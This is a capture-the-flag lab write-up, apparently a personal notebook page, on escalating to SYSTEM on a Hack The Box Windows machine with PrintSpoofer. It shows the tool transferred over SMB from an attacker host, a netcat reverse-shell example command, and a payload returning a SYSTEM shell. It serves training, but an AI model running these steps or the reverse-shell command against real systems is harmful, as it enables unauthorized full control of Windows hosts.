InfoSec LAB

Remote_Privilege_Escalation_3

Created: 3 min read

PrintSpoofer

There is another alternative to JuicyPotato for Windows above Windows 10 1809 and Windows Server 2016/2019 It’s called PrintSpoofer. In order for this tool to work, the exploit has to be run as user with either LOCAL SERVICE or NETWORK SERVICE and have SeImpersonatePrivilege

The current user is a local service account and has SeImpersonatePrivilege enabled

exploit (printspoofer)

Exploit can be downloaded online

Exploitation

ps c:\tmp> copy \\10.10.14.5\smb\potato\PrintSpoofer64.exe .

I transferred the exploit to the target system over SMB

ps c:\tmp> .\PrintSpoofer64.exe -h
 
PrintSpoofer v0.1 (by @itm4n)
 
  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
 
arguments:
  -c <CMD>    Execute the command *CMD*
  -i          Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h          that's me :)
 
examples:
  - Run PowerShell as SYSTEM in the current console
      PrintSpoofer.exe -i -c powershell.exe
  - Spawn a SYSTEM command prompt on the desktop of the session 1
      PrintSpoofer.exe -d 1 -c cmd.exe
  - Get a SYSTEM reverse shell
      printspoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"

PrintSpoofer can spawn a new process attached to the current session as well as assigned to a session Since the current PowerShell session isn’t as interactive, I will just execute the payload

ps c:\tmp> .\PrintSpoofer64.exe -c "C:\tmp\pe.exe"
[+] found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

executing printspoofer with the -c flag to launch c:\tmp\pe.exe upon successful exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ nnc 1234          
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.180] 49786
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\Windows\system32> whoami
nt authority\system
ps c:\Windows\system32> hostname
remote
ps c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::ba
   ipv6 address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
   link-local ipv6 address . . . . . : fe80::25dd:3404:8d18:2459%12
   ipv4 address. . . . . . . . . . . : 10.10.10.180
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks